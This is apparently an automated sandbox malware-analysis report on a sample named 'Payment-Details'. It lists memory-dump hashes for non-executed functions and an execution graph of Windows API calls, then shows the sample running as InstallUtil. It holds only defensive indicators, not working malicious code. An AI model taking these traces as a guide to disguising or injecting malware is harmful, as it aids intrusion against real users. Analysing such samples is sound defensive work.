                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 26b6bc8a2c822461ecfe6c664196ad727167b46844e35668d6198a70755c6aee
                                        • Instruction ID: b28865d61791e4c70b9a8ccd78370ed1d4d33ad833231c4765c5beb1cbb1177e
                                        • Opcode Fuzzy Hash: 26b6bc8a2c822461ecfe6c664196ad727167b46844e35668d6198a70755c6aee
                                        • Instruction Fuzzy Hash: 15C08CB01101048BD3006BA1E45C33EBA32E74A310F5080149A03222D4CAB40C848795
                                        Function 07231210 Relevance: .0, Instructions: 8COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                        • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                        • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                        • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                        Function 07235700 Relevance: .0, Instructions: 7COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4cd8da0282c8acc202f687b46a348a094e1bd0d699c4e4edccd3a58070e6655b
                                        • Instruction ID: 6fb886ddcfa79f56cae25f15881682da3bbff431ddd13bf46609683e64a36857
                                        • Opcode Fuzzy Hash: 4cd8da0282c8acc202f687b46a348a094e1bd0d699c4e4edccd3a58070e6655b
                                        • Instruction Fuzzy Hash: 2BB09232040208AB87019A84E804859BB6AAB58A20B54C025B609061118B32A822DB94

                                        Non-executed Functions

                                        Function 07250040 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: :
                                        • API String ID: 0-336475711
                                        • Opcode ID: 1b4a4e3b0fab632f8baece1822f562f0e081b0abe8981eabf309790a3f623159
                                        • Instruction ID: 4fc9116c4bfeb4e5894cdace46e14e4d7701f50f2ac244203af3ebf249a86a1a
                                        • Opcode Fuzzy Hash: 1b4a4e3b0fab632f8baece1822f562f0e081b0abe8981eabf309790a3f623159
                                        • Instruction Fuzzy Hash: 0B4120B1E14A188BEB58CF6B8C4469EFAF7AFC9301F14D1B9981CAA255EB7405428F11
                                        Function 070E530F Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: !
                                        • API String ID: 0-2657877971
                                        • Opcode ID: 012bdc67f37d08e8ba89ac8b63dc7cf0727a391ae9ec8ee4347917cd695d9546
                                        • Instruction ID: 7b378271c30d2c35ab3d23d540b944a65ce678dd581aeed0f63231dd33c83a17
                                        • Opcode Fuzzy Hash: 012bdc67f37d08e8ba89ac8b63dc7cf0727a391ae9ec8ee4347917cd695d9546
                                        • Instruction Fuzzy Hash: DB3181B1D056558BE759CF6B8D4429EFBF7AFC9300F14C1BA8448A6264DB7409818F11
                                        Function 070E5320 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: !
                                        • API String ID: 0-2657877971
                                        • Opcode ID: 0d37ebf837e376ea95e5be7ba6e0115ba4edda9f8aa4c333abe281a31bd20528
                                        • Instruction ID: b279d4f2d7bf9b3bb7be9675e0a767a408deb651498c0bf51e20f008a6e22c0e
                                        • Opcode Fuzzy Hash: 0d37ebf837e376ea95e5be7ba6e0115ba4edda9f8aa4c333abe281a31bd20528
                                        • Instruction Fuzzy Hash: 273191B1E156198BEB5CCF6B8D4469EFAF7AFC9300F14D5BA841CA6264DB700A818F11
                                        Function 0725D158 Relevance: .3, Instructions: 339COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 95e4ebb1def65465d3c05fdab9e707a33d1b6a26402b6e12ddd85b44820ed6e1
                                        • Instruction ID: 6c231b07421bfd0df97f0cc057a9f8b21099a8825ff91bead923ff810f4a9d5c
                                        • Opcode Fuzzy Hash: 95e4ebb1def65465d3c05fdab9e707a33d1b6a26402b6e12ddd85b44820ed6e1
                                        • Instruction Fuzzy Hash: 97D106B4B10206CFDB14DF69C584AA9BBF6FF88314F658599E805AB362D734EC81CB50
                                        Function 019F6117 Relevance: .3, Instructions: 289COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ceceb2322e101957e43ddf63a41ecc26dc653e81db36b6be3642f600aad592da
                                        • Instruction ID: fc3c275a2ad7d785e72ab3a7f54c948e1a309e88abd7d23fa08fa33a3b52dbf9
                                        • Opcode Fuzzy Hash: ceceb2322e101957e43ddf63a41ecc26dc653e81db36b6be3642f600aad592da
                                        • Instruction Fuzzy Hash: D6E1263181071ACACB01EBA4D8547ADF7B5FF99300F60879AD9093B214EB706AC9CF91
                                        Function 019F6128 Relevance: .3, Instructions: 264COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1675674479.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_19f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e18bab50d47a967a27f50017f6836cb5143f9571306895e710a9750dc78a00f
                                        • Instruction ID: 57eed51179a7ec4eace808eff4539405e43c0fa4ce1e283b867c8a2294746dbb
                                        • Opcode Fuzzy Hash: 4e18bab50d47a967a27f50017f6836cb5143f9571306895e710a9750dc78a00f
                                        • Instruction Fuzzy Hash: FFD1043091075ACACB01EBA4D894BADF7B5FF99300F50979AD9093B214EB706AC5CF91
                                        Function 07258D38 Relevance: .3, Instructions: 253COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4657fa2be66c13568232175e716de272aa0d6fad2538da5fbe433879ea12b572
                                        • Instruction ID: 7b476badce1bacf9baf2692791f5f03233213637a160686c67ececa5830b5261
                                        • Opcode Fuzzy Hash: 4657fa2be66c13568232175e716de272aa0d6fad2538da5fbe433879ea12b572
                                        • Instruction Fuzzy Hash: 87B119B0E25218CFDB14DF69D844BADBBF6FB8A300F1090A9D94DA7255D7B46985CF00
                                        Function 07258D28 Relevance: .2, Instructions: 249COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eb89c8562a51ce2eff26bd0ffb7760db9340b174a82e611a96c45e332d3a63cd
                                        • Instruction ID: 94914db165aafe74f882b16f5680811c7ef5dd38c55eff3fdb222265104cfe23
                                        • Opcode Fuzzy Hash: eb89c8562a51ce2eff26bd0ffb7760db9340b174a82e611a96c45e332d3a63cd
                                        • Instruction Fuzzy Hash: 5FB127B0E11218CFDB14DFAAD844BADBBF2FF89300F1090A9D949A7255DBB46985CF01
                                        Function 0636D5E8 Relevance: .2, Instructions: 244COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 04e4fd4b2a159cbbcd8313c3348fbb547418072ec24ba92f9b075f8e808f2e89
                                        • Instruction ID: f4598d7b94d7a685ad2823605abeef0ccef59ff7f18808c0c75084a947c63f00
                                        • Opcode Fuzzy Hash: 04e4fd4b2a159cbbcd8313c3348fbb547418072ec24ba92f9b075f8e808f2e89
                                        • Instruction Fuzzy Hash: 8CB1E2B0E04208CFDB64CFAAD984B9DBBF6FF49304F60906AE409A7255D7345985CF90
                                        Function 0636D5F8 Relevance: .2, Instructions: 243COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 75b3aa1a6be04cc0a09dac208a05ce477fd78cdda6d1a185e40ee2fbd194cc8e
                                        • Instruction ID: 25d265d8fea18337e6f7d94fac27c6234e20b81b2eb5f19ab0328c2e4afd6bc7
                                        • Opcode Fuzzy Hash: 75b3aa1a6be04cc0a09dac208a05ce477fd78cdda6d1a185e40ee2fbd194cc8e
                                        • Instruction Fuzzy Hash: 47B1F470E04208CFDB64CFAAD984BADBBF6FF49304F60906AE409A7259D7745985CF90
                                        Function 0723A940 Relevance: .2, Instructions: 224COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1edb7f1b7658ea068708a77c352952cf85c1fea24e461f4df81c83af11508d7d
                                        • Instruction ID: 5a099d73fdc1d260014a07f96bb0878da28be71310b225e44f9a333387fca362
                                        • Opcode Fuzzy Hash: 1edb7f1b7658ea068708a77c352952cf85c1fea24e461f4df81c83af11508d7d
                                        • Instruction Fuzzy Hash: D9A159B0D10208CFDB50CFA8D949BADBBF6FB49300F10A129E54AA7295DB745C86CF55
                                        Function 06369022 Relevance: .2, Instructions: 215COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9c2aaa8aaa52602bafbc1c7627cd05a7f64bedaec7f9e257a68ad70e403849b8
                                        • Instruction ID: d02c823439c6435aa35cb05f7ca631c4fe3bb58083a11d84fde3b40f8ca6b58b
                                        • Opcode Fuzzy Hash: 9c2aaa8aaa52602bafbc1c7627cd05a7f64bedaec7f9e257a68ad70e403849b8
                                        • Instruction Fuzzy Hash: 81910370E01218CFDB54CFA9D984BADBBF6FB49300F209069E909A7299DB305D85CF91
                                        Function 066F4461 Relevance: .2, Instructions: 199COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 195d5818288df5d480a30c8277c50c8bf019e5e2751cdb3497809fafc11b85ce
                                        • Instruction ID: 94e036699702cc4a434560ede17581a544262625025d9c78ecf09db79641f98e
                                        • Opcode Fuzzy Hash: 195d5818288df5d480a30c8277c50c8bf019e5e2751cdb3497809fafc11b85ce
                                        • Instruction Fuzzy Hash: C3812870D14208CFDB44DFA5D485BAEBBF6EB49300F109029E61AA7656DB389885CF41
                                        Function 066F4470 Relevance: .2, Instructions: 196COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07e7cf732db14d241ecd4e7d6e5f377dfdfbd28f220b61b580eebe1836bf2e6e
                                        • Instruction ID: 73a21c413791402c27dd9082430ef4d1815d0b4c8194b01cdace27db7d9893a5
                                        • Opcode Fuzzy Hash: 07e7cf732db14d241ecd4e7d6e5f377dfdfbd28f220b61b580eebe1836bf2e6e
                                        • Instruction Fuzzy Hash: 1C810870D14208CFDB44DFA5D485BAEB7F6FB49300F109029E61AA7766DB389885CF45
                                        Function 0723A4E8 Relevance: .1, Instructions: 145COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c9a3f00d2ff6359826e3d7efda4ad453937e469f35f5bc877509782983b922e2
                                        • Instruction ID: 7bbf08e4d973fdd9313c3acc6cdecabd7de77ac0b7401c9f6e883b92df694c25
                                        • Opcode Fuzzy Hash: c9a3f00d2ff6359826e3d7efda4ad453937e469f35f5bc877509782983b922e2
                                        • Instruction Fuzzy Hash: D05113F0E21218DBDB14CFA9D8897EDBBF6FB8A300F10913AE949A7254D7749845CB50
                                        Function 0723A4F8 Relevance: .1, Instructions: 139COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f41fea71c2e643915f88ca3d51d41954d048a1b3c4d25849ad3d8fcb924431d6
                                        • Instruction ID: 12adf3d850494d4d353263cdb393388a25029afb389bd09ab186fbbf484681e0
                                        • Opcode Fuzzy Hash: f41fea71c2e643915f88ca3d51d41954d048a1b3c4d25849ad3d8fcb924431d6
                                        • Instruction Fuzzy Hash: 2051F3F0D25218DBDB04CFA9D488BEDBBF6FB4A300F10902AE949A7254D7749845CB51
                                        Function 06360920 Relevance: .1, Instructions: 128COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d925a4981486a96056aff20f3a9efbd72071912c2fb95318e19c1a17274c6832
                                        • Instruction ID: 61d213a5ffdb449e9230ec3940c57b94c0aedb74f163fc55ece035f810496993
                                        • Opcode Fuzzy Hash: d925a4981486a96056aff20f3a9efbd72071912c2fb95318e19c1a17274c6832
                                        • Instruction Fuzzy Hash: 145107B1E00209DFDB48CFA9D955AEEBBF6FB89300F108029E905A7365DB345905CF91
                                        Function 07250006 Relevance: .1, Instructions: 106COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 51ae52e57291fd05a6bf8839dee3da257efcea3d777bbaad80b80b564670b80f
                                        • Instruction ID: 2a209d404565cb257c1abe5bc5424e30e83006e03f6cd2e13b1f36e5fb3fd752
                                        • Opcode Fuzzy Hash: 51ae52e57291fd05a6bf8839dee3da257efcea3d777bbaad80b80b564670b80f
                                        • Instruction Fuzzy Hash: 9C4194B1D15A548BEB1DCF6B8C5018AFBF3AFC9200F18C1BAC85CAA265E7340542CF01
                                        Function 0723E758 Relevance: .1, Instructions: 102COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e8518ac5799f7545a9c9fec1d0d8319b386526991916c6cc73734a0104323491
                                        • Instruction ID: 0988e48b0ceb9882e0f4c04c5c4e6e63e487b471aeff3c56b94b3758d4947625
                                        • Opcode Fuzzy Hash: e8518ac5799f7545a9c9fec1d0d8319b386526991916c6cc73734a0104323491
                                        • Instruction Fuzzy Hash: ED4113F0D25258CBEB18CF9AD9447DDBBF6BB8A300F15D16AD409B7224DB74498A8F04
                                        Function 0723E748 Relevance: .1, Instructions: 90COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 683079cce4e6d516e3266a2be0e5969e939235145e78696b8c3fa35109ea0ddd
                                        • Instruction ID: 6e3b3b15b990e81ff1a7b905cc570a8e7f7287e3eb5ff90be2f236b85a9042e5
                                        • Opcode Fuzzy Hash: 683079cce4e6d516e3266a2be0e5969e939235145e78696b8c3fa35109ea0ddd
                                        • Instruction Fuzzy Hash: 3C3137B1D15258CBEB58CFAAD9447DEFBF6BF89300F14D16AD408A7214DB74098A8F05
                                        Function 0751001E Relevance: .1, Instructions: 78COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693466177.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7510000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b7ba3028a46941998adc6036e4ab291e96b5819a06a1adbfce6a83b88c5f0d73
                                        • Instruction ID: c9bfdcf5b845c2d94586eb97416db498f5a7848cc9e7650642427f171f968fbe
                                        • Opcode Fuzzy Hash: b7ba3028a46941998adc6036e4ab291e96b5819a06a1adbfce6a83b88c5f0d73
                                        • Instruction Fuzzy Hash: A73109B1D046548BEB29CF2B8C042DABBF6BFC9310F14C0EAD90CA6255EB3509C58F51
                                        Function 063612B0 Relevance: .1, Instructions: 71COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: acf80b1ee746f184659784dc534f7638e439863498fb68b9db0e74f783bd7c30
                                        • Instruction ID: 9cb1e40d41279fff10215b77c3380a263101a15dc7a494adc04cd7231cbdb095
                                        • Opcode Fuzzy Hash: acf80b1ee746f184659784dc534f7638e439863498fb68b9db0e74f783bd7c30
                                        • Instruction Fuzzy Hash: 8E2126B1D042189BEB68CF6BC8443DEFBF7AF89300F14C06AD409A7655DB7009898F91
                                        Function 063612C0 Relevance: .1, Instructions: 71COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 23666e7652de185077ae2261d78ddc97821d842e53aea6c323446cffbfacb92a
                                        • Instruction ID: f2b276acc134d7cbf9931c66cbb3b302f9dddb2e09a8a8bb199033453cc850c7
                                        • Opcode Fuzzy Hash: 23666e7652de185077ae2261d78ddc97821d842e53aea6c323446cffbfacb92a
                                        • Instruction Fuzzy Hash: A121F5B0D04618CBEB68CF6BC8447DEFAFBAF89300F24D06AD419A7659DB7445858F90
                                        Function 07510040 Relevance: .1, Instructions: 66COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693466177.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7510000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 450e3442f1a419efe0571914c512529d751572538c9c30d585b672d79cdd62bf
                                        • Instruction ID: d7c7e53ae12f8401217cb7595be35d7cd839ac67554f08f428598d10725b5e06
                                        • Opcode Fuzzy Hash: 450e3442f1a419efe0571914c512529d751572538c9c30d585b672d79cdd62bf
                                        • Instruction Fuzzy Hash: 5721C6B1D446198BEB28CF5B88443DABAF7BBC9210F14C4BA990CA6254EB750AC58E50
                                        Function 070E41A8 Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e7f23e4798a438b3f97eb7395ae6e585389a768a2e7eec24ebefef69d9059c6
                                        • Instruction ID: 9433cfb64e927f43aef5a9f4a601de618900516a02ca75fe101f0654ccba4c31
                                        • Opcode Fuzzy Hash: 1e7f23e4798a438b3f97eb7395ae6e585389a768a2e7eec24ebefef69d9059c6
                                        • Instruction Fuzzy Hash: 8921CCB1D056548BDB28CF6BCC402DEFBF7AFC9300F14C1AAD85866224DB340A418F54
                                        Function 070E41B8 Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 18bcde5aaa835eea241b14e60dadebaa9163f78e3736bb47758d39f820068a17
                                        • Instruction ID: c0205f3630bd208ccad15be5465e303b22c6a3e3be03fedcc4d687c16f75845b
                                        • Opcode Fuzzy Hash: 18bcde5aaa835eea241b14e60dadebaa9163f78e3736bb47758d39f820068a17
                                        • Instruction Fuzzy Hash: C321CCB1D056588BEB18CF6BC8402DDBAF7AFC9300F14C1A9D41CAA264DB740A858F44

                                        Execution Graph

                                        Execution Coverage:11.8%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:88
                                        Total number of Limit Nodes:14
                                        execution_graph 40863 5c03b30 40864 5c03b76 GetCurrentProcess 40863->40864 40866 5c03bc1 40864->40866 40867 5c03bc8 GetCurrentThread 40864->40867 40866->40867 40868 5c03c05 GetCurrentProcess 40867->40868 40869 5c03bfe 40867->40869 40870 5c03c3b 40868->40870 40869->40868 40871 5c03c63 GetCurrentThreadId 40870->40871 40872 5c03c94 40871->40872 40873 5c0e210 40874 5c0e278 CreateWindowExW 40873->40874 40876 5c0e334 40874->40876 40877 2190848 40879 219084e 40877->40879 40878 219091b 40879->40878 40883 2191380 40879->40883 40887 5c02a18 40879->40887 40891 5c02a28 40879->40891 40885 2191383 40883->40885 40884 21914a6 40884->40879 40885->40884 40895 2198188 40885->40895 40888 5c02a28 40887->40888 40908 5c02144 40888->40908 40892 5c02a37 40891->40892 40893 5c02144 2 API calls 40892->40893 40894 5c02a58 40893->40894 40894->40879 40896 2198192 40895->40896 40897 21981ac 40896->40897 40900 5c7f729 40896->40900 40904 5c7f738 40896->40904 40897->40885 40901 5c7f74d 40900->40901 40902 5c7f95e 40901->40902 40903 5c7fd78 GlobalMemoryStatusEx GlobalMemoryStatusEx 40901->40903 40902->40897 40903->40901 40905 5c7f74d 40904->40905 40906 5c7f95e 40905->40906 40907 5c7fd78 GlobalMemoryStatusEx GlobalMemoryStatusEx 40905->40907 40906->40897 40907->40905 40909 5c0214f 40908->40909 40912 5c038b4 40909->40912 40911 5c043de 40913 5c038bf 40912->40913 40914 5c04b04 40913->40914 40917 5c06387 40913->40917 40921 5c06388 40913->40921 40914->40911 40918 5c063a9 40917->40918 40919 5c063cd 40918->40919 40925 5c06538 40918->40925 40919->40914 40923 5c063a9 40921->40923 40922 5c063cd 40922->40914 40923->40922 40924 5c06538 2 API calls 40923->40924 40924->40922 40926 5c06545 40925->40926 40927 5c0657e 40926->40927 40929 5c048c4 40926->40929 40927->40919 40930 5c048cf 40929->40930 40932 5c069f0 40930->40932 40933 5c048d4 40930->40933 40932->40932 40934 5c048df 40933->40934 40940 5c065b4 40934->40940 40936 5c06a5f 40944 5c0bd78 40936->40944 40950 5c0bd60 40936->40950 40937 5c06a99 40937->40932 40943 5c065bf 40940->40943 40941 5c07ce8 40941->40936 40942 5c06388 2 API calls 40942->40941 40943->40941 40943->40942 40946 5c0bdf5 40944->40946 40947 5c0bda9 40944->40947 40945 5c0bdb5 40945->40937 40946->40937 40947->40945 40956 5c0bfe0 40947->40956 40960 5c0bff0 40947->40960 40952 5c0bda9 40950->40952 40953 5c0bdf5 40950->40953 40951 5c0bdb5 40951->40937 40952->40951 40954 5c0bfe0 2 API calls 40952->40954 40955 5c0bff0 2 API calls 40952->40955 40953->40937 40954->40953 40955->40953 40957 5c0bff0 40956->40957 40963 5c0c031 40957->40963 40958 5c0bffa 40958->40946 40962 5c0c031 2 API calls 40960->40962 40961 5c0bffa 40961->40946 40962->40961 40964 5c0c051 40963->40964 40965 5c0c074 40963->40965 40964->40965 40969 5c0c2c8 LoadLibraryExW 40964->40969 40970 5c0c2d8 LoadLibraryExW 40964->40970 40965->40958 40966 5c0c06c 40966->40965 40967 5c0c278 GetModuleHandleW 40966->40967 40968 5c0c2a5 40967->40968 40968->40958 40969->40966 40970->40966 40971 5c03d78 DuplicateHandle 40972 5c03e0e 40971->40972

                                        Executed Functions

                                        Function 05C766D8 Relevance: .8, Instructions: 797COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
